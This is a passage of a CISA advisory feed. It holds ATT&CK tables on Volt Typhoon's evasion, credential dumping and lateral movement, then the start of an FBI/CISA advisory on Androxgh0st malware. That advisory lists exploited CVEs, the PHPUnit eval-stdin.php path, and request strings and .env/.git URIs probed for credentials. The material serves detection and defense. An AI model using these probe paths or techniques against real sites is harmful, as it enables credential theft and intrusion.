4105. <caption><em>Table 11: Volt Typhoon actors ATT&CK Techniques for Enterprise – Defense Evasion</em></caption>
4106. <thead>
4107. <tr>
4108. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Defense Evasion</strong></th>
4109. <th scope="col" role="columnheader"> </th>
4110. <th scope="col" role="columnheader"> </th>
4111. </tr>
4112. <tr>
4113. <th role="columnheader"><strong>Technique Title</strong></th>
4114. <th role="columnheader"><strong>ID</strong></th>
4115. <th role="columnheader"><strong>Use</strong></th>
4116. </tr>
4117. </thead>
4118. <tbody>
4119. <tr>
4120. <td>Direct Volume Access</td>
4121. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1006/" title="Direct Volume Access">T1006</a></td>
4122. <td>Volt Typhoon has executed the Windows-native <code>vssadmin</code> command to create a volume shadow copy.</td>
4123. </tr>
4124. <tr>
4125. <td>Indicator Removal: Clear Persistence</td>
4126. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1070/009/" title="Indicator Removal: Clear Persistence">T1070.009</a></td>
4127. <td>Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names.</td>
4128. </tr>
4129. <tr>
4130. <td>Indicator Removal: Clear Windows Event Logs</td>
4131. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001</a></td>
4132. <td>Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names.</td>
4133. </tr>
4134. <tr>
4135. <td>Indicator Removal: File Deletion</td>
4136. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1070/004/" title="Indicator Removal: File Deletion">T1070.004</a></td>
4137. <td>Volt Typhoon created <code>systeminfo.dat</code> in <code>C:\Users\Public\Documents</code>, but subsequently deleted it.</td>
4138. </tr>
4139. <tr>
4140. <td>Masquerading: Match Legitimate Name or Location</td>
4141. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1036/005/" title="Masquerading: Match Legitimate Name or Location">T1036.005</a></td>
4142. <td>Volt Typhoon has selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity and masquerading file names.</td>
4143. </tr>
4144. <tr>
4145. <td>Modify Registry</td>
4146. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1112" title="Modify Registry">T1112</a></td>
4147. <td>Volt Typhoon has used the <code>netsh</code> command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server.</td>
4148. </tr>
4149. <tr>
4150. <td>Obfuscated Files or Information: Software Packing</td>
4151. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1027/002/" title="Obfuscated Files or Information: Software Packing">T1027.002</a></td>
4152. <td>Volt Typhoon has obfuscated FRP client files (<code>BrightmetricAgent.exe</code> and <code>SMSvcService.exe</code>) and the command-line port scanning utility ScanLine by packing the files with Ultimate Packer for Executables (UPX).</td>
4153. </tr>
4154. <tr>
4155. <td>System Binary Proxy Execution</td>
4156. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1218/" title="System Binary Proxy Execution">T1218</a></td>
4157. <td>Volt Typhoon uses hands-on-keyboard activity via the command-line and use other native tools and processes on systems (often referred to as “LOLBins”), known as LOTL, to maintain and expand access to the victim networks.</td>
4158. </tr>
4159. </tbody>
4160. </table>
4161. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4162. <caption><em>Table 12: Volt Typhoon actors ATT&CK Techniques for Enterprise – Credential Access</em></caption>
4163. <thead>
4164. <tr>
4165. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Credential Access</strong></th>
4166. <th scope="col" role="columnheader"> </th>
4167. <th scope="col" role="columnheader"> </th>
4168. </tr>
4169. <tr>
4170. <th role="columnheader"><strong>Technique Title</strong></th>
4171. <th role="columnheader"><strong>ID</strong></th>
4172. <th role="columnheader"><strong>Use</strong></th>
4173. </tr>
4174. </thead>
4175. <tbody>
4176. <tr>
4177. <td>Brute Force: Password Cracking</td>
4178. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1110/002/" title="Brute Force: Password Cracking">T1110.002</a></td>
4179. <td>Volt Typhoon has exfiltrated <code>NTDS.dit</code> and <code>SYSTEM</code> registry hive to crack passwords offline.</td>
4180. </tr>
4181. <tr>
4182. <td>Credentials from Password Stores</td>
4183. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1555" title="Credentials from Password Stores">T1555</a></td>
4184. <td>Volt Typhoon has installed browsers saved passwords history, credit card details, and cookies.</td>
4185. </tr>
4186. <tr>
4187. <td>Credentials from Password Stores: Credentials from Web Browsers</td>
4188. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1555/003/" title="Credentials from Password Stores: Credentials from Web Browsers">T1555.003</a></td>
4189. <td>Volt Typhoon has strategically targeted network administrator web browser data, focusing on both browsing history and stored credentials.</td>
4190. </tr>
4191. <tr>
4192. <td>OS Credential Dumping: LSASS Memory</td>
4193. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
4194. <td>Volt Typhoon used a DLL with <code>MiniDump</code> and the process ID of Local Security Authority Subsystem Service (LSASS) to dump the LSASS process memory and obtain credentials.</td>
4195. </tr>
4196. <tr>
4197. <td>OS Credential Dumping: NTDS</td>
4198. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/003/" title="OS Credential Dumping: NTDS">T1003.003</a></td>
4199. <td>Volt Typhoon appears to prioritize obtaining valid credentials by extracting the Active Directory database file (<code>NTDS.dit</code>).</td>
4200. </tr>
4201. <tr>
4202. <td>Unsecured Credentials</td>
4203. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1552/" title="Unsecured Credentials">T1552</a></td>
4204. <td>Volt Typhoon has obtained credentials insecurely stored on an appliance.</td>
4205. </tr>
4206. <tr>
4207. <td>Unsecured Credentials: Private Keys</td>
4208. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1552/004/" title="Unsecured Credentials: Private Keys">T1552.004</a></td>
4209. <td>Volt Typhoon has accessed a Local State file that contains the Advanced Encryption Standard (AES) encryption key used to encrypt the passwords stored in the Chrome browser, which enables the actors to obtain plaintext passwords stored in the Login Data file in the Chrome browser.</td>
4210. </tr>
4211. </tbody>
4212. </table>
4213. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4214. <caption><em>Table 13: Volt Typhoon actors ATT&CK Techniques for Enterprise – Discovery</em></caption>
4215. <thead>
4216. <tr>
4217. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Discovery</strong></th>
4218. <th scope="col" role="columnheader"> </th>
4219. <th scope="col" role="columnheader"> </th>
4220. </tr>
4221. <tr>
4222. <th role="columnheader"><strong>Technique Title</strong></th>
4223. <th role="columnheader"><strong>ID</strong></th>
4224. <th role="columnheader"><strong>Use</strong></th>
4225. </tr>
4226. </thead>
4227. <tbody>
4228. <tr>
4229. <td>Account Discovery: Local Account</td>
4230. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1087/001/" title="Account Discovery: Local Account">T1087.001</a></td>
4231. <td>Volt Typhoon executed <code>net user</code> and <code>quser</code> for user account information.</td>
4232. </tr>
4233. <tr>
4234. <td>Application Window Discovery</td>
4235. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1010/" title="Application Window Discovery">T1010</a></td>
4236. <td>Volt Typhoon created and accessed a file named <code>rult3uil.log</code> on a Domain Controller in <code>C:\Windows\System32\</code>. The <code>rult3uil.log</code> file contained user activities on a compromised system, showcasing a combination of window title information and focus shifts, keypresses, and command executions across Google Chrome and Windows PowerShell, with corresponding timestamps.</td>
4237. </tr>
4238. <tr>
4239. <td>Browser Information Discovery</td>
4240. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1217/" title="Browser Information Discovery">T1217</a></td>
4241. <td>Volt Typhoon has installed browsers saved passwords history, credit card details, and cookies.</td>
4242. </tr>
4243. <tr>
4244. <td>File and Directory Discovery</td>
4245. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a></td>
4246. <td>Volt Typhoon enumerated several directories​, including directories containing vulnerability testing and cyber related content and facilities data, such as construction drawings.</td>
4247. </tr>
4248. <tr>
4249. <td>Log Enumeration</td>
4250. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1654/" title="Log Enumeration">T1654</a></td>
4251. <td>Volt Typhoon has captured successful logon events.</td>
4252. </tr>
4253. <tr>
4254. <td>Network Service Discovery</td>
4255. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a></td>
4256. <td>Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.</td>
4257. </tr>
4258. <tr>
4259. <td>Peripheral Device Discovery</td>
4260. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1120" title="Peripheral Device Discovery">T1120</a></td>
4261. <td>Volt Typhoon has obtained the victim's system screen dimension and display devices information.</td>
4262. </tr>
4263. <tr>
4264. <td>Permission Groups Discovery</td>
4265. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1069/" title="Permission Groups Discovery">T1069</a></td>
4266. <td>Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.</td>
4267. </tr>
4268. <tr>
4269. <td>Process Discovery</td>
4270. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a></td>
4271. <td>Volt Typhoon executed <code>tasklist /v</code> to gather a detailed process listing.</td>
4272. </tr>
4273. <tr>
4274. <td>Query Registry</td>
4275. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1012/" title="Query Registry">T1012</a></td>
4276. <td>Volt Typhoon has interacted with a PuTTY application by enumerating existing stored sessions.</td>
4277. </tr>
4278. <tr>
4279. <td>Software Discovery</td>
4280. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1518" title="Software Discovery">T1518</a></td>
4281. <td>Volt Typhoon has obtained the victim's list of applications installed on the victim's system.</td>
4282. </tr>
4283. <tr>
4284. <td>System Information Discovery</td>
4285. <td><a href="http://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a></td>
4286. <td>Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.</td>
4287. </tr>
4288. <tr>
4289. <td>System Location Discovery</td>
4290. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1614/" title="System Location Discovery">T1614</a></td>
4291. <td>Volt Typhoon has obtained the victim's system current locale.</td>
4292. </tr>
4293. <tr>
4294. <td>System Network Configuration Discovery: Internet Connection Discovery</td>
4295. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1016/001/" title="System Network Configuration Discovery: Internet Connection Discovery">T1016.001</a></td>
4296. <td>Volt Typhoon employs <code>ping</code> with various IP addresses to check network connectivity and <code>net start</code> to list running services.</td>
4297. </tr>
4298. <tr>
4299. <td>System Owner/User Discovery</td>
4300. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1033/" title="System Owner/User Discovery">T1033</a></td>
4301. <td>Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for system information, network service, group, and user discovery.</td>
4302. </tr>
4303. <tr>
4304. <td>System Service Discovery</td>
4305. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1007/" title="System Service Discovery">T1007</a></td>
4306. <td>Volt Typhoon employs <code>ping</code> with various IP addresses to check network connectivity and <code>net start</code> to list running services.</td>
4307. </tr>
4308. <tr>
4309. <td>System Time Discovery</td>
4310. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1124/" title="System Time Discovery">T1124</a></td>
4311. <td>Volt Typhoon has obtained the victim's system timezone.</td>
4312. </tr>
4313. </tbody>
4314. </table>
4315. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4316. <caption><em>Table 14: Volt Typhoon actors ATT&CK Techniques for Enterprise – Lateral Movement</em></caption>
4317. <thead>
4318. <tr>
4319. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Lateral Movement</strong></th>
4320. <th scope="col" role="columnheader"> </th>
4321. <th scope="col" role="columnheader"> </th>
4322. </tr>
4323. <tr>
4324. <th role="columnheader"><strong>Technique Title</strong></th>
4325. <th role="columnheader"><strong>ID</strong></th>
4326. <th role="columnheader"><strong>Use</strong></th>
4327. </tr>
4328. </thead>
4329. <tbody>
4330. <tr>
4331. <td>Remote Service Session Hijacking</td>
4332. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1563/" title="Remote Service Session Hijacking">T1563</a></td>
4333. <td>Volt Typhoon potentially had access to a range of critical PuTTY profiles, including those for water treatment plants, water wells, an electrical substation, operational technology systems, and network security devices. This would enable them to access these critical systems.</td>
4334. </tr>
4335. <tr>
4336. <td>Remote Services: Cloud Services</td>
4337. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1021/007/" title="Remote Services: Cloud Services">T1021.007</a></td>
4338. <td>During the period of Volt Typhoon’s known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of <code>NTDS.dit</code>.</td>
4339. </tr>
4340. <tr>
4341. <td>Remote Services: Remote Desktop Protocol</td>
4342. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a></td>
4343. <td>Volt Typhoon has moved laterally to the Domain Controller via an interactive RDP session using a compromised account with domain administrator privileges.</td>
4344. </tr>
4345. <tr>
4346. <td>Use Alternate Authentication Material</td>
4347. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1550/" title="Use Alternate Authentication Material">T1550</a></td>
4348. <td>Volt Typhoon may be capable of using other methods such as Pass the Hash or Pass the Ticket for lateral movement.</td>
4349. </tr>
4350. <tr>
4351. <td>Valid Accounts: Cloud Accounts</td>
4352. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/004/" title="Valid Accounts: Cloud Accounts">T1078.004</a></td>
4353. <td>During the period of Volt Typhoon’s known network presence, there were anomalous login attempts to an Azure tenant potentially using credentials previously compromised from theft of <code>NTDS.dit</code>.</td>
4354. </tr>
4355. </tbody>
4356. </table>
4357. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4358. <caption><em>Table 15: Volt Typhoon actors ATT&CK Techniques for Enterprise – Collection</em></caption>
4359. <thead>
4360. <tr>
4361. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Collection</strong></th>
4362. <th scope="col" role="columnheader"> </th>
4363. <th scope="col" role="columnheader"> </th>
4364. </tr>
4365. <tr>
4366. <th role="columnheader"><strong>Technique Title</strong></th>
4367. <th role="columnheader"><strong>ID</strong></th>
4368. <th role="columnheader"><strong>Use</strong></th>
4369. </tr>
4370. </thead>
4371. <tbody>
4372. <tr>
4373. <td>Archive Collected Data</td>
4374. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1560/" title="Archive Collected Data">T1560</a></td>
4375. <td>Volt Typhoon collected sensitive information obtained from a file server in multiple zipped files.</td>
4376. </tr>
4377. <tr>
4378. <td>Archive Collected Data: Archive via Utility</td>
4379. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a></td>
4380. <td>Volt Typhoon has compressed and archived the extracted <code>ntds.dit</code> and accompanying registry files (by executing <code>ronf.exe</code>, which was likely a renamed version of <code>rar.exe</code>).</td>
4381. </tr>
4382. <tr>
4383. <td>Data Staged</td>
4384. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1074/" title="Data Staged">T1074</a></td>
4385. <td>Volt Typhoon accessed the file <code>C:\Users\{redacted}\Downloads\History.zip</code>, which presumably contained data from the User Data directory of the user’s Chrome browser, which the actors likely saved in the Downloads directory for exfiltration.</td>
4386. </tr>
4387. <tr>
4388. <td>Screen Capture</td>
4389. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1113/" title="Screen Capture">T1113</a></td>
4390. <td>Volt Typhoon has obtained a screenshot of the victim's system using two libraries (<code>gdi32.dll</code> and <code>gdiplus.dll</code>)</td>
4391. </tr>
4392. </tbody>
4393. </table>
4394. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4395. <caption><em>Table 16: Volt Typhoon actors ATT&CK Techniques for Enterprise – Command and Control</em></caption>
4396. <thead>
4397. <tr>
4398. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Command and Control</strong></th>
4399. <th scope="col" role="columnheader"> </th>
4400. <th scope="col" role="columnheader"> </th>
4401. </tr>
4402. <tr>
4403. <th role="columnheader"><strong>Technique Title</strong></th>
4404. <th role="columnheader"><strong>ID</strong></th>
4405. <th role="columnheader"><strong>Use</strong></th>
4406. </tr>
4407. </thead>
4408. <tbody>
4409. <tr>
4410. <td>Encrypted Channel</td>
4411. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1573/" title="Encrypted Channel">T1573</a></td>
4412. <td>Volt Typhoon has setup FRP clients on a victim’s corporate infrastructure to establish covert communications channels for command and control.</td>
4413. </tr>
4414. <tr>
4415. <td>Ingress Tool Transfer</td>
4416. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a></td>
4417. <td>Volt Typhoon uses legitimate, but outdated versions of network admin tools. For example, in one confirmed compromise, actors downloaded an outdated version of <code>comsvcs.dll</code>, on the DC in a non-standard folder.</td>
4418. </tr>
4419. <tr>
4420. <td>Proxy</td>
4421. <td><a href="https://attack.mitre.org/techniques/T1090/" title="Proxy">T1090</a></td>
4422. <td>Volt Typhoon has setup FRP clients on a victim’s corporate infrastructure to establish covert communications channels for command and control.</td>
4423. </tr>
4424. <tr>
4425. <td>Proxy: Internal Proxy</td>
4426. <td><a href="https://attack.mitre.org/techniques/T1090/001/" title="Proxy: Internal Proxy">T1090.001</a></td>
4427. <td>Volt Typhoon has used the <code>netsh</code> command, a legitimate Windows command, to create a PortProxy registry modification on the PRTG server.</td>
4428. </tr>
4429. <tr>
4430. <td>Proxy: Multi-hop Proxy</td>
4431. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1090/003/" title="Proxy: Multi-hop Proxy">T1090.003</a></td>
4432. <td>Volt Typhoon uses multi-hop proxies for command-and-control infrastructure.</td>
4433. </tr>
4434. </tbody>
4435. </table>
4436. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
4437. <caption><em>Table 17: Volt Typhoon actors ATT&CK Techniques for Enterprise – Exfiltration</em></caption>
4438. <thead>
4439. <tr>
4440. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Exfiltration</strong></th>
4441. <th scope="col" role="columnheader"> </th>
4442. <th scope="col" role="columnheader"> </th>
4443. </tr>
4444. </thead>
4445. <tbody>
4446. <tr>
4447. <td><strong>Technique Title</strong></td>
4448. <td><strong>ID</strong></td>
4449. <td><strong>Use</strong></td>
4450. </tr>
4451. <tr>
4452. <td>Exfiltration Over Alternative Protocol</td>
4453. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a></td>
4454. <td>Volt Typhoon exfiltrated files via Server Message Block (SMB).</td>
4455. </tr>
4456. </tbody>
4457. </table>
4458. </description>
4459.  <pubDate>Thu, 01 Feb 2024 15:37:41 EST</pubDate>
4460.    <dc:creator>CISA</dc:creator>
4461.    <guid isPermaLink="false">/node/20848</guid>
4462.    </item>
4463. <item>
4464.  <title>Known Indicators of Compromise Associated with Androxgh0st Malware</title>
4465.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a</link>
4466.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
4467. <p>The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.</p>
4468. <p>The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.</p>
4469. <p>Download the PDF version of this report:</p>
4470.  
4471.  
4472.  
4473.  
4474.  
4475. <div class="c-file">
4476.    <div class="c-file__download">
4477.    <a href="https://www.cisa.gov/sites/default/files/2024-01/aa24-016a-known-indicators-of-compromise-associated-with-adroxgh0st-malware_0.pdf" class="c-file__link" target="_blank">AA24-016A Known Indicators of Compromise Associated with Androxgh0st Malware</a>
4478.    <span class="c-file__size">(PDF,       576.40 KB
4479.  )</span>
4480.  </div>
4481. </div>
4482. <p>For a downloadable copy of IOCs, see:</p>
4483.  
4484.  
4485.  
4486.  
4487.  
4488. <div class="c-file">
4489.    <div class="c-file__download">
4490.    <a href="https://www.cisa.gov/sites/default/files/2024-01/AA24-016A.stix_.xml" class="c-file__link" target="_blank">AA24-016A STIX XML</a>
4491.    <span class="c-file__size">(XML,       45.81 KB
4492.  )</span>
4493.  </div>
4494. </div>
4495.  
4496.  
4497.  
4498.  
4499.  
4500. <div class="c-file">
4501.    <div class="c-file__download">
4502.    <a href="https://www.cisa.gov/sites/default/files/2024-01/AA24-016A-known-indicators-of-compromise-associated-with-adroxgh0st-malware.stix__0.json" class="c-file__link" target="_blank">AA24-016A STIX JSON</a>
4503.    <span class="c-file__size">(JSON,       39.87 KB
4504.  )</span>
4505.  </div>
4506. </div>
4507. <h3><strong>TECHNICAL DETAILS</strong></h3>
4508. <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK<sup>®</sup> for Enterprise</a> framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
4509. <h4><strong>Overview</strong></h4>
4510. <p>Androxgh0st malware has been observed establishing a botnet [<a href="https://attack.mitre.org/versions/v14/techniques/T1583/005/" title="Acquire Infrastructure: Botnet">T1583.005</a>] for victim identification and exploitation in target networks. According to open source reporting[<a href="https://fortiguard.fortinet.com/threat-signal-report/5066/androxgh0st-malware-actively-used-in-the-wild" title="AndroxGh0st Malware Actively Used in the Wild">1</a>], Androxgh0st is a Python-scripted malware [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/006/" title="Command and Scripting Interpreter: Python">T1059.006</a>] primarily used to target .env files that contain confidential information, such as credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1552/001/" title="Unsecured Credentials: Credentials In Files">T1552.001</a>] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [<a href="https://attack.mitre.org/versions/v14/techniques/T1046/" title="Network Service Discovery">T1046</a>] and exploiting exposed credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>] and application programming interfaces (APIs) [<a href="https://attack.mitre.org/versions/v14/techniques/T1114/" title="Email Collection">T1114</a>], and web shell deployment [<a href="https://attack.mitre.org/versions/v14/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>].</p>
4511. <h4><strong>Targeting the PHPUnit</strong></h4>
4512. <p>Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [<a href="https://attack.mitre.org/versions/v14/techniques/T1595/" title="Active Scanning">T1595</a>] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-9841" title="CVE-2017-9841">CVE-2017-9841</a> to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [<a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>]. Websites using the PHPUnit module that have internet-accessible (exposed) <code>/vendor</code> folders are subject to malicious <code>HTTP POST</code> requests to the <code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code> uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.</p>
4513. <p>Malicious actors likely use Androxgh0st to download malicious files [<a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.</p>
4514. <h4><strong>Laravel Framework Targeting</strong></h4>
4515. <p>Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level <code>.env</code> file is exposed and contains credentials for accessing additional services. <strong>Note:</strong> <code>.env</code> files commonly store credentials and tokens. Threat actors often target <code>.env</code> files to steal these credentials within the environment variables.</p>
4516. <p>If the <code>.env</code> file is exposed, threat actors will issue a GET request to the <code>/.env</code> URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named <code>0x[]</code> containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.</p>
4517. <p>Androxgh0st malware can also access the application key [<a href="https://attack.mitre.org/versions/v14/tactics/TA0006/" title="Credential Access">TA0006</a>] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [<a href="https://attack.mitre.org/versions/v13/techniques/T1027/010/" title="Obfuscated Files or Information: Command Obfuscation">T1027.010</a>]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, <code>XSRF-TOKEN</code>, and included in a future GET request to the website. The vulnerability defined in <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-15133" title="CVE-2018-15133">CVE-2018-15133</a> indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.</p>
4518. <h4><strong>Apache Web Server Targeting</strong></h4>
4519. <p>In correlation with <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-41773" title="CVE-2021-41773">CVE-2021-41773</a>, Androxgh0st<em> </em>actors have been observed scanning vulnerable web servers [<a href="https://attack.mitre.org/versions/v14/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a>] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [<a href="https://attack.mitre.org/versions/v14/techniques/T1083/" title="File and Directory Discovery">T1083</a>]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.</p>
4520. <p>If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [<a href="https://attack.mitre.org/versions/v14/techniques/T1136/" title="Create Account">T1136</a>]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [<a href="https://attack.mitre.org/versions/v14/techniques/T1583/006/" title="Acquire Infrastructure: Web Services">T1583.006</a>].</p>
4521. <h3><strong>INDICATORS OF COMPROMISE (IOCs)</strong></h3>
4522. <p>Based on investigations and analysis, the following requests are associated with Androxgh0st activity:</p>
4523. <ul>
4524. <li>Incoming GET and POST requests to the following URIs:
4525. <ul>
4526. <li><code>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</code></li>
4527. <li><code>/.env</code></li>
4528. </ul>
4529. </li>
4530. <li>Incoming POST requests with the following strings:
4531. <ul>
4532. <li><code>[0x%5B%5D=androxgh0st]</code></li>
4533. <li><code>ImmutableMultiDict([('0x[]', 'androxgh0st')])</code></li>
4534. </ul>
4535. </li>
4536. </ul>
4537. <p>In both previously listed POST request strings, the name <code>androxgh0st</code> has been observed to be replaced with other monikers.</p>
4538. <p>Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:</p>
4539. <ul>
4540. <li><code>/info</code></li>
4541. <li><code>/phpinfo</code></li>
4542. <li><code>/phpinfo.php</code></li>
4543. <li><code>/?phpinfo=1</code></li>
4544. <li><code>/frontend_dev.php/$</code></li>
4545. <li><code>/_profiler/phpinfo</code></li>
4546. <li><code>/debug/default/view?panel=config</code></li>
4547. <li><code>/config.json</code></li>
4548. <li><code>/.json</code></li>
4549. <li><code>/.git/config</code></li>
4550. <li><code>/live_env</code></li>
4551. <li><code>/.env.dist</code></li>
4552. <li><code>/.env.save</code></li>
4553. <li><code>/environments/.env.production</code></li>
4554. <li><code>/.env.production.local</code></li>
4555. <li><code>/.env.project</code></li>
4556. <li><code>/.env.development</code></li>
4557. <li><code>/.env.production</code></li>
4558. <li><code>/.env.prod</code></li>
4559. <li><code>/.env.development.local</code></li>
4560. <li><code>/.env.old</code></li>
4561. <li><code>/<insert-directory>/.env </code>
4562. <ul>
